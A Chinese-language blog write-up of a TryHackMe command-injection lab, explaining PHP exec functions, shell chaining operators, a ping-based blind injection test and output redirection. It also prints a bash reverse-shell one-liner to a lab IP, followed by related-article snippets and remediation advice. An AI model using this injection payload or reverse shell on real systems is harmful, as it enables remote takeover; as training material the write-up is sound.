命令执行

最新推荐文章于 2023-06-02 20:28:45 发布
最新推荐文章于 2023-06-02 20:28:45 发布
阅读量623 收藏
点赞数
分类专栏: Try Hack Me靶机 文章标签: 黑盒测试 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/108842571
版权

Injection

操作系统命令注入演练。演示OS命令注入

命令注入也称为命令注入

PHP常见的执行命令的函数:system() ; exec() ; shell_exec() ; popen() ; passthru() 等等。函数的返回结果不同,各位自行查阅。

Windows和Linux都支持的命令连接符

        cmd1 | cmd2    只执行cmd2

        cmd1 || cmd2    只有当cmd1执行失败后,cmd2才被执行

        cmd1 & cmd2    先执行cmd1,不管是否成功,都会执行cmd2

        cmd1 && cmd2    先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2

Linux还支持

        分号(;)

        cmd1 ; cmd2按顺序依次执行,先执行cmd1再执行cmd2

这是一个命令执行的页面

后端代码大概是这样

命令是否被执行可以使用ping命令控制次数查看页面的延迟(加载)时间判断。

Linux可以直接ping,没有默认次数,页面会一直加载,也可以加-c参数指定次数。

Windows默认次数为4,可以加-n参数指定ping的次数 如:ping 127.0.0.1 -n 10

靶场服务器系统为Linux,这里用的是

root;ping 127.0.0.1

页面一直是加载状态 

如果执行的命令没有回显,可以在网站路径下生成一个txt文件,

用>把执行的结果重定向到txt文件上查看执行的结果

查看内核

 

 

反弹shell

服务器上的大多数nc都没有-c、-e参数

这边用bash反弹shell

bash -c 'bash -i >&/dev/tcp/10.10.79.73/8888 0>&1'

z4yn:)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows Bat命令编写大全
levin blog
09-09 611
<br />1 echo 和 @<br /><br />@ #关闭单行回显<br /><br />echo off #从下一行开始关闭回显<br /><br />@echo off #从本行开始关闭回显。一般批处理第一行都是这个<br /><br />echo on #从下一行开始打开回显<br /><br />echo #显示当前是 e
cmd命令
qq_41170620的博客
06-09 712
1什么是cmd命令? cmd是command的缩写.即命令提示符(CMD) 2有啥作用? 查询系统的信息或者是判断网络的好坏。 3进入cmd界面:win+r–>cmd–>enter(按照顺序输入执行) 4试试命令1:help 和/? 这两个命令,都表示提示信息,我来展示一下help 和/?命令的鬼王风采,会得到下面的原生命令。(红色部分为常用命令,先记住常用命令,) ASSOC 显示或修改文件扩展名关联。 ATTRIB 显示或更改文件属性。 BREAK
Windows cmd命令搜索顺序
weixin_34248258的博客
01-17 841
一、在cmd中执行一个不带后缀的命令(不带路径),首先会在无后缀的系统命令(如cd、dir等)中搜索,如果找到了就执行命令, (dir是无后缀的系统命令所以优先执行,无视当前目录中的dir.exe) 如果在无后缀的系统命令中找不到,则在当前目录中查找该命令+.exe、.msc、.bat等后缀的可执行文件或批处理文件,如果找到了则执行,如果没找到,再在环境变量那些目录中按上述规则搜索。 (...
cmd同时执行多条命令
ihateright的博客
06-02 4917
这样就会依次执行命令1、命令2、命令3。如果你想要多个命令同时执行,可以使用。在 Windows 的命令提示符下,可以使用。这样就会同时启动命令1、命令2、命令3。符号来同时执行多条命令
Windows下自动化批量运行CMD命令
李明洲的博客
06-19 8789
bat 批处理脚本是 Windows 系统上用于批量执行任务的脚本,后缀名为.bat 具体步骤: 1. 新建一个txt文本,后缀名改为.bat。然后右键选择使用记事本打开,编辑需要运行的命令行(可为多条) 2. 在当前路径下打开CMD命令行窗口,输入 start .\test.bat 3. 回车后,将自动打开另一个CMD窗口,并逐条执行脚本中的命令。 ...
cmd如何一次运行多行命令
yangjian1156的博客
06-27 5376
cmd如何一次运行多行命令 直接复制执行的话,cmd会先依次执行每一行。这并不是想要结果因为cmd 不会将\ 识别为换行符所以,需要将 \ 换成 ^,如下 再复制到cmd中,可正常执行~备注:百度好多都不符合......
命令执行小结
ashMOB的博客
01-05 2565
命令执行小结 文章目录命令执行小结代码执行命令执行绕过思路对单词的过滤无参数RCE目录更换尝试读取文件无数字字母RCE异或或取反自增(*7.0.12以上版本不可使用*)上传临时文件getshell绕过重定向突破disable_function限制骚操作shell进阶绕过安全目录FFI 代码执行 通俗的来说是执行php的代码,经常需要利用命令执行有关的函数来读取flag 常用函数: eval() 例子: <?php eval($_GET['pass']) ?> assert() PHP
命令
weixin_50159703的博客
12-14 7006
第1章 echo(横向) 输出内容到屏幕或者文件中 > 输出重定向 先清空在写入 [root@oldboyedu-lnb ~]# echo oldboyedu oldboyedu [root@oldboyedu-lnb ~]# echo oldboyedu > 1.txt [root@oldboyedu-lnb ~]# cat 1.txt oldboyedu >> 追加输出重定向 不清空追加到文件的底部 [root@oldboyedu-ln
第一节 命令执行介绍-01
09-15
命令执行漏洞是一种常见的 Web 应用程序漏洞,指的是攻击者可以通过用户输入来执行恶意系统命令,导致服务器或系统敏感信息泄露、被植入木马、被控制等严重后果。下面是命令执行漏洞的相关知识点: 一、命令执行...
用vbs实现cmd多命令运行功能代码
09-30
标题中的“用vbs实现cmd多命令运行功能代码”指的是使用Visual Basic Script(VBS)编写脚本,以便在Windows的命令行界面(CMD)中连续执行多个DOS命令。这种技术在自动化任务或者需要批处理执行一系列操作的场景中...
Shell 命令执行顺序分析[图]
01-10
对于每一个读取的管道,Shell都回将命令分割,为管道设置I/O,并且对每一个命令依次执行下面的操作:整个步骤顺序如上图所示,看起来有些复杂。当命令行被处理时,每一个步骤都是在Shell的内存里发生的;Shell不会真...
whatis命令 查询命令执行功能
01-20
whatis命令是用于查询一个命令执行什么功能,并将查询结果打印到终端上。 whatis命令在用catman -w命令创建的数据库中查找command参数指定的命令、系统调用、库函数或特殊文件名。whatis命令显示手册部分的页眉行。...
cmd 顺序启动服务_CMD生疏了?教你10招酷酷的Windows命令行指令
weixin_39763683的博客
11-21 312
[PConline 技巧]经常在电影里看到这样的情节,某大神把键盘敲得震天响,一大串黑屏文字后,屏幕蓦然出现了一行大字“资料已销毁!”。虽然类似的情节常被大家戏称为NC,但不可否认,命令行的确是Windows里一项比较酷的功能。好吧,我知道很多小伙伴其实之前玩过CMD,但现在可能已经生疏了,而某些小伙伴甚至并没玩过CMD。那么,今天就教给大家几招超酷的CMD小指令,学会后赶快去哄妹纸吧!番外篇:可...
cmd 顺序启动服务_CMD运行指令
weixin_39955421的博客
11-22 512
CMD运行指令开始→运行→CMD→键入以下命令即可:1.Msconfig.exe---系统配置实用程序如上图,在“启动”中可以禁用不必要的启动项目,以便电脑启动更快。2.cmd---osk 屏幕键盘3.gpedit.msc-----组策略4.Nslookup-------IP地址侦测器5.explorer-------打开资源管理器 (win7 下是打开库文件)6.lusrmgr.msc----本...
【批处理DOS-CMD命令-汇总和小结】-Cmd窗口中常用操作符(<、<<、&<、>、>>、&>、&、&&、||、|、()、;、@、““、‘‘)
小坏蛋的博客
06-30 7462
(1)小于号
顺序执行多个python文件(cmd)
m0_46215294的博客
04-21 614
【代码】顺序执行多个python文件(cmd)
cmd常用命令
热门推荐
ChineseSoftware的博客
07-29 1万+
一、 常用命令 win+R: compmgmt.msc,打开Windows自带的计算机管理器 lusrmgr.msc(本机用户和用户):用于设置用户的权限等信息。 devmgmt.msc(设备管理):计算机的硬件设备以及安装的驱动管理。 diskmgmt.msc(磁盘管理):可以看到磁盘的分区等信息,也可以自己开辟分区。 services.msc(本地服务设置):有些程序只有开启了相关的服务才能运行,就在这里设置。 perfomon.msc(性能监视器):性能监视器,作用不大。 eventvmr(事.
常见的隐写工具的使用
z4yn:)的博客
09-28 5209
隐写术 常见的隐写工具的使用 steghide 隐藏文件 steghide embed -cf [载体] -ef [隐藏的文件] -p [设置密码] 例:steghide embed -cf sun.jpg -ef a.txt -p 123123 提取文件 steghide extract -sf sun.jpg steghide不支持png格式的隐写,zsteg支持png。 zsteg 用gem安装zsteg,没有小飞机的用国内的源 proxychains代理一挂,30秒安.
命令执行漏洞的修复建议
最新发布
01-02
命令执行漏洞是一种常见的安全漏洞,可以通过执行恶意系统命令来对应用程序进行攻击。为了修复这种漏洞,以下是一些建议: 1. 输入验证和过滤:对于用户输入的数据,进行严格的验证和过滤,确保只允许合法的输入。可以使用白名单或正则表达式来限制输入的字符集和格式。 2. 参数化查询:对于需要执行系统命令的函数,应该使用参数化查询来构建命令,而不是直接将用户输入拼接到命令中。参数化查询可以防止命令注入攻击。 3. 最小权限原则:将应用程序运行的用户权限限制到最低必要权限。这样即使攻击者成功执行了恶意命令,也只能在受限的环境中操作,减少了攻击的影响范围。 4. 安全沙盒:将应用程序运行在一个安全沙盒环境中,限制其对系统资源的访问。这样即使攻击者成功执行了恶意命令,也无法对系统进行破坏。 5. 安全编码实践:开发人员应该遵循安全编码实践,如避免使用可执行代码作为用户输入的一部分,避免使用不可信的数据直接执行系统命令等。 6. 安全审计和监控:定期对应用程序进行安全审计,检查是否存在命令执行漏洞。同时,实施监控措施,及时发现并应对潜在的攻击行为。 请注意,以上建议只是一些常见的修复建议,具体的修复方法还需要根据应用程序的具体情况进行评估和实施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值